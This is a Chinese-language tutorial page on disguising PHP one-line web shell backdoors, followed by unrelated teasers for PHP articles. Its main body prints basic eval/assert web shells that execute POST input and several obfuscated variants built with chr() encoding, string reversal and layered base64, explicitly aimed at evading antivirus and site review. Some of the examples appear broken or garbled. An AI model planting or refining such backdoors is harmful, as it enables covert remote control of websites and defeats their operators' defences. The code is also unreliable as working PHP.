php一句话木马变形技巧

PHP一句话木马指的是由一条PHP语句组成的一个后门程序,具有隐蔽性高、使用方便等优点。为了防止被杀软或网站审查系统检测出程序的特征,黑客们会进行木马变形。

一、基本架构

了解一句话木马变形技巧前,首先需要了解一句话木马的基本架构。一般情况下,它的基本架构由连接器和木马执行器两个部分组成:

连接器:

一句话木马变形技巧中最常见的是将连接器中‘eval($_POST['pass'])’改成一些被杀软无法识别的变量形式,并添加制造混淆和嵌套的特殊语法,例如:

@eval(urldecode(preg_replace('/[a-z]/ie','chr(ord("$0")-1)',base64_decode('php_shell_code_base64_here'))));

木马执行器:

通常包括系列系统操作。基本语法为:

if (get_magic_quotes_gpc()) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = (!function_exists("get_magic_quotes_gpc") || !get_magic_quotes_gpc()) ? stripslashes_array($_POST) : $_POST;
    $_COOKIE = stripslashes_array($_COOKIE) ;
}
eval('/*your malicious code here*/')

二、变形技巧

一些常见的PHP一句话木马变形技巧如下:

1. 字符串逆置

将一些字符串反转顺序,例如:

$abc = "\x74\x72\x79";
$abc_arr = explode(",", chunk_split($abc, 2, ","));
$abc = implode("", array_reverse($abc_arr));

2. 替换引号

由于一些审查系统会检测匹配引号双引号的存在,如果可以做出以下替换就会让木马更具灵活性,例如:

$_GET{'xxx'}=str_replace(chr(34),'',$cname); 

3. 隐藏函数

为了不让特定函数能被检查到,可以使用魔术变量或间接调用等方法,例如:

call_user_func_array(call_user_func(chr(99).chr(114).chr(101).chr(97).chr(116).chr(101).chr(95).chr(102).chr(117).chr(110).chr(99).chr(116).chr(105).chr(111).chr(110),array(097,114,103,118)),array());

三、示例演示

1. 示例1:字符串替换

例如以下原生的PHP一句话木马代码:

<?php set_magic_quotes_runtime(0); @eval($_POST[act]);?>

经过字符串替换可以变形为以下形式:

<?php $vv = strval($_SERVER); $vv{15} = '$'; $x = substr($vv, 0, 29).chr(34).$vv{28}.$vv{29}.$vv{12}.$vv{2}.$vv{23}.$vv{14}.$vv{16}.$vv{12}.$vv{20}.$vv{2}.$vv{25}.$vv{17}.$vv{2}.$vv{27}.'";'; $f = chr(102).chr(105).'lter'; $$f($x); unset($x); ?>

其中,$vv$_SERVER的字符串,将其中的一些字符替换,最终得到新的执行器。

2. 示例2:进制转换

以下是原始代码:

<?php $fornix = $_POST['pass'];@assert($fornix);?>

修改后的新代码,使用进制转换实现变形:

<?php 
$c=1870; $d=1234567890;
$c=989998415454557780121;$ef=array((($d>>24)^($c>>16)&0xff),(($d>>16)^($c>>8)&0xff),(($d^$c)&0xff),(($d>>8)^($c>>24)&0xff));
$qmpl="\xff\xee\xff\xea\x0c\x00";
$vvv=$qmpl{0}; $bs=5;$mmd=$qmpl{5}; for($j=1;$j<strlen($qmpl);$j++){$bv=$qmpl{$j}; $vvv.=chr(ord($bv)+$bs); $bs+=3; $bs%=7;}; $vvv.=chr($mmd); for($jj=0;$jj<4;$jj++){$vvv.=chr($ef[$jj]);};
$vvv=base64_encode($vvv); $gg=str_replace("=","",base64_encode($vvv)."yj");@assert(base64_decode(strrev($gg))); ?>

以上代码会对传输的content进行进制转换,再用base64进行多次编码,并添加一些特地构造出来的数据,最后用assert函数进行调用。通过这种方式来进行变形能够降低木马在杀软中的与众不同,提高木马的存活性。

希望以上内容能够给您提供一些帮助,在编写安全代码的同时也能够更好地了解常见的木马变形技术。

本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:php一句话木马变形技巧 - Python技术站

(0)
上一篇 2023年5月23日
下一篇 2023年5月23日

相关文章

  • PHP简单实现单点登录功能示例

    下面是详细的“PHP简单实现单点登录功能示例”的攻略,希望对你有所帮助。 什么是单点登录? 单点登录(Single Sign-On,简称SSO)是一种身份认证技术,允许用户只需一次登录即可在不同的系统中访问多个应用程序。在传统的身份验证方案中,用户必须在每个应用程序中分别登录,这既费时又不便。使用单点登录,用户无需频繁输入用户名和密码,而且可以更轻松地访问多…

    PHP 2023年5月24日
    00
  • 2014最热门的24个php类库汇总

    首先,为了让读者更容易了解本篇攻略的结构,我们需要为其添加合适的标题,例如: 2014最热门的24个php类库汇总攻略 接下来,我们需要按照常规的markdown语法,编写出详细的攻略内容,包含以下几个方面: 介绍 在攻略的介绍部分,我们需要向读者解释本篇文章的主题和内容,同时也要适当地解释什么是php类库。 一个php类库是一系列PHP类的集合,它们提供了…

    PHP 2023年5月23日
    00
  • PHP采集相关教程之一 CURL函数库

    下面我将为你详细讲解“PHP采集相关教程之一 CURL函数库”的完整攻略。 什么是CURL函数库? CURL是一个开源的用于传输数据的库,支持FTP、HTTP、HTTPS、Gopher、Telnet等许多协议,常用于爬虫、接口请求等网络数据传输场景。 CURL在PHP中是通过CURL函数库来实现的,使用CURL可以方便地进行HTTP请求与响应的处理。 CUR…

    PHP 2023年5月27日
    00
  • php使用parse_str实现查询字符串解析到变量中的方法

    使用parse_str函数可以将查询字符串解析到变量中。该函数的原型如下: void parse_str (string $str, array &$result) 其中,$str参数为待解析的查询字符串,$result参数是一个引用,表示解析结果将存放在此变量中。以下是使用parse_str函数的完整步骤: 首先,通过$_SERVER[‘QUERY…

    PHP 2023年5月26日
    00
  • Laravel中如何轻松容易的输出完整的SQL语句

    在Laravel中,可以通过启用SQL日志来轻松地输出完整的SQL语句。具体步骤如下: 打开Laravel项目中的配置文件 config/database.php,找到 connections 部分。 找到对应的数据库连接配置(比如 mysql),将该连接配置的 log_queries 值设置为 true。代码如下: php ‘mysql’ => [ …

    PHP 2023年5月26日
    00
  • Python实现可自定义大小的截屏功能

    关于”Python实现可自定义大小的截屏功能”的攻略,基本思路如下: 寻找桌面截屏模块 调用截屏模块,指定截图窗口大小 将截图保存至指定位置 此外,我们还需要用到Pillow模块来保存图片文件。 关于第一步,Python提供了PIL(Python Imaging Library)模块,我们可以使用它的ImageGrab模块进行桌面截屏。具体代码如下: fro…

    PHP 2023年5月27日
    00
  • PHP获取当前系统时间的方法小结

    以下是“PHP获取当前系统时间的方法小结”的完整攻略。 标准方式获取系统时间 通过以下代码可以获取当前系统时间: date_default_timezone_set(‘Asia/Shanghai’); echo date(‘Y-m-d H:i:s’); 其中date_default_timezone_set函数可以设置当前系统所在时区,其参数为时区字符串。d…

    PHP 2023年5月30日
    00
  • php计算几分钟前、几小时前、几天前的几个函数、类分享

    关于PHP计算几分钟前、几小时前、几天前的函数和类,可以使用一些常用的函数或者类来实现。 以函数方式计算 1.计算几分钟前,可以使用以下代码: function minute_ago($time){ $t = time()-strtotime($time); $f = array( ‘31536000’=>’年’, ‘2592000’=>’个月’…

    PHP 2023年5月26日
    00
合作推广
合作推广
分享本页
返回顶部